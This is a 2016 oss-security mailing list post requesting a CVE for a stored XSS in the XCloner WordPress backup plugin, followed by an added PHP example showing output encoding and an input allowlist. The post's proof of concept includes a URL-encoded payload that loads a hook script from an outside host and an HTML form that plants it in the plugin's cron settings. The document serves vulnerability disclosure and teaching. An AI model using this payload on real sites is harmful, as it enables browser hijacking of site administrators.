Date: Wed, 27 Jul 2016 02:35:46 +0000
From: limingxing <limingxing@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE request : a stored XSS in Xcloner for wordpress

Hi

     I found a stored XSS in Xcloner for WordPress.  The XSS filter can 
be bypassed.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Cron setting" page (URL is 
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), 
set the "Backup name" (cron_bname) like 
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" method="post">
             <input type="hidden" name="cron_bname" value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" />
             <input type="submit" name="submit">
         </form>
     </html>


     Fix
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team
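
The following is an added example, not part of the original post and not XCloner's code. It assumes the stored "Backup name" is echoed into a double-quoted HTML attribute, as the leading `1">` in the PoC value suggests, and shows that rendering beside one that encodes the value on output; the function names, the field markup and the allowlist policy are hypothetical.

```php
<?php
// Added example; not XCloner's code. Function names and markup are hypothetical.

// Constructed value with the same shape as the reported one: a double quote
// ends the attribute, '>' ends the tag, then new markup begins.
const SAMPLE = '1"><script src=//example.invalid/x.js on';

// Unsafe: stored setting concatenated into a double-quoted attribute.
function render_unsafe(string $stored): string
{
    return '<input type="text" name="cron_bname" value="' . $stored . '">';
}

// Hardened: encode for the attribute context when writing the page.
// WordPress code would call esc_attr() here instead.
function render_safe(string $stored): string
{
    $enc = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="cron_bname" value="' . $enc . '">';
}

// Input-side allowlist (assumed policy for a backup name).
function is_valid_backup_name(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name) === 1;
}

// True when the value escaped its attribute and opened a tag of its own.
function has_injected_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$renderings = ['unsafe' => render_unsafe(SAMPLE), 'safe' => render_safe(SAMPLE)];
foreach ($renderings as $label => $html) {
    printf("%-6s injected=%s  %s\n", $label, var_export(has_injected_tag($html), true), $html);
}
printf("allowlist accepts sample: %s\n", var_export(is_valid_backup_name(SAMPLE), true));
printf("allowlist accepts backup_2016-07: %s\n", var_export(is_valid_backup_name('backup_2016-07'), true));
```

Encoding at output time is the control that holds even when a value was stored before validation was introduced; the allowlist only reduces what can reach storage from now on.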
